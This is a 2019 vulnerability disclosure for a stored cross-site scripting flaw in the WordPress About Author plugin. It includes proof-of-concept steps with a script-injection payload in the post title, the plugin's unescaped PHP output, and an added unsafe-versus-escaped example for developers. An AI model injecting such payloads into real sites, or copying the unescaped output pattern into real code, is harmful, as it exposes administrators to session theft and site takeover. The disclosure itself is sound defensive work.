WordPress About Author <= 1.3.9 Authenticated Stored XSS

source link: https://nitesculucian.github.io/2019/10/25/about-author-1-3-9-authentificated-stored-xss-vulnerability/

Oct 25, 2019


WordPress About Author <= 1.3.9 Authenticated Stored XSS

The WordPress About Author plugin, version 1.3.9 and earlier, is affected by an authenticated stored cross-site scripting (XSS) vulnerability.

Initial submission of the vulnerability

# Exploit Title: WordPress About Author <= 1.3.9 Authenticated Stored XSS Vulnerability
# Date: 25-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://weblizar.com/plugins/about-author-pro/
# Software Link: https://wordpress.org/plugins/about-author/
# Version: 1.3.9
# Tested on: Ubuntu 18.04 / WordPress 5.3
 
1. Description:  
 
The WordPress About Author plugin, version 1.3.9 and earlier, is affected by an authenticated stored cross-site scripting (XSS) vulnerability.

2. Proof of Concept: 
 
Stored Cross-site scripting (XSS)
- Using a WordPress user, access < your_target > /wp-admin/post-new.php?post_type=about_author (About Author > Add new)
- Insert in the post_title input the following payload: `"><script>alert(1)</script>`
- Save. The stored cross-site scripting (XSS) vulnerability affects all pages/routes within the WordPress admin panel.

Stored response output:
```html
<div id="AMSA" style="display:none;">
<h3>Select About Author Shortcode And Widget To Insert Into Post</h3>
<select id="Ab_Tm_ME">
<option value='5748'>wqddqwqd</option><option value='5749'>ads</option><option value='5751'>
"><script>alert(1)</script></option></select>
<button class='button primary' id='Ab_tm_insert'>Insert About Author Shortcode</button>
</div>
```

Detailed analysis of the vulnerability

From the admin panel, at About Author > Add new, we can store the payload `"><script>alert(1)</script>` as a post title. Storing it is not the issue in itself; XSS vulnerabilities are mainly output-encoding issues. Looking at /wp-content/plugins/about-author at lines 335-353, we can observe the following unescaped output of user-supplied data: line 345 echoes database-stored data directly, which leads to the stored XSS.

```php
<div id="AMSA" style="display:none;">
	<?php $all_posts = wp_count_posts( 'about_author')->publish;
	if(!$all_posts==null) {?>
	<h3><?php esc_html_e('Select About Author Shortcode And Widget To Insert Into Post','WL_ABTM_TXT_DM');?></h3>
	<select id="Ab_Tm_ME">
		<?php
		global $wpdb;
		$A_B_T_shortcodegallerys = $wpdb->get_results("SELECT post_title, ID FROM $wpdb->posts WHERE post_status = 'publish'	AND post_type='about_author' ");
		foreach ($A_B_T_shortcodegallerys as $A_B_T_shortcodegallery) {
			if($A_B_T_shortcodegallery->post_title) { $title_var=$A_B_T_shortcodegallery->post_title;} else { $title_var="(no title)"; }
			// Line 345: $title_var (the stored post_title) is concatenated into the HTML without esc_html()/esc_attr()
			echo "<option value='".$A_B_T_shortcodegallery->ID."'>".$title_var."</option>";
		} ?>
	</select>
	<button class='button primary' id='Ab_tm_insert'><?php esc_html_e('Insert About Author Shortcode','WL_ABTM_TXT_DM');?></button>
	<?php } else { ?>
		<h1 align="center"> <?php esc_html_e( 'No About Author Shortcode not_found ', 'WL_ABTM_TXT_DM' ); ?> </h1><?php
	}
	?>
</div>
```

The successful exploitation of the vulnerability looks as follows in the HTML output:

```html
<div id="AMSA" style="display:none;">
<h3>Select About Author Shortcode And Widget To Insert Into Post</h3>
<select id="Ab_Tm_ME">
<option value='5748'>wqddqwqd</option><option value='5749'>ads</option><option value='5751'>
"><script>alert(1)</script></option></select>
<button class='button primary' id='Ab_tm_insert'>Insert About Author Shortcode</button>
</div>
```

Note that the div, hidden with style="display:none;", is included on all pages of the WordPress admin panel, so the vulnerability was reachable from every one of them. Keep in mind that `"><script>alert(1)</script>` is executed regardless of style="display:none;": hiding an element does not stop a script element inside it from running.

How to fix

Update to the latest available version of the About Author plugin.
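For developers maintaining similar code, the following is an added example (not the plugin's own code, and not part of the original advisory) showing the vulnerable option loop from line 345 next to a hardened version that escapes each value for the context it lands in. The `$rows` array is a constructed stand-in for the rows `$wpdb->get_results()` returns; the `esc_html()`/`esc_attr()` fallbacks only exist so the file also runs under the plain `php` CLI, and inside WordPress the real functions are used.

```php
<?php
// Added example: rendering the About Author <select> so that a stored
// post_title cannot break out of its <option> element.

// Fallbacks for running outside WordPress (assumption: the CLI has no WP loaded).
// WordPress' own esc_html()/esc_attr() take precedence when they are defined.
if (!function_exists('esc_html')) {
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Vulnerable form: mirrors the plugin's line 345, title concatenated unescaped.
function render_options_unsafe(array $rows): string {
    $html = '';
    foreach ($rows as $row) {
        $title = $row->post_title !== '' ? $row->post_title : '(no title)';
        $html .= "<option value='" . $row->ID . "'>" . $title . "</option>";
    }
    return $html;
}

// Hardened form: the ID is forced to an integer, the title is escaped for the
// text context (esc_html), and any attribute value goes through esc_attr.
function render_options_safe(array $rows): string {
    $html = '';
    foreach ($rows as $row) {
        $title = $row->post_title !== '' ? $row->post_title : '(no title)';
        $html .= '<option value="' . esc_attr((string) (int) $row->ID) . '">'
               . esc_html($title)
               . '</option>';
    }
    return $html;
}

// Constructed sample rows: one normal title and one carrying the advisory's payload.
$rows = [
    (object) ['ID' => 5748, 'post_title' => 'wqddqwqd'],
    (object) ['ID' => 5751, 'post_title' => '"><script>alert(1)</script>'],
];

echo "Unsafe output:\n" . render_options_unsafe($rows) . "\n\n";
echo "Hardened output:\n" . render_options_safe($rows) . "\n";
// In the hardened output the payload appears as &quot;&gt;&lt;script&gt;...,
// i.e. inert text inside the <option>, not a live <script> element.
```

Run it with `php example.php` and compare the two outputs: the escaping has to match the output context (text node versus attribute), which is why the hardened loop uses both helpers rather than a single generic sanitizer at input time.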

Public appearances

Other references


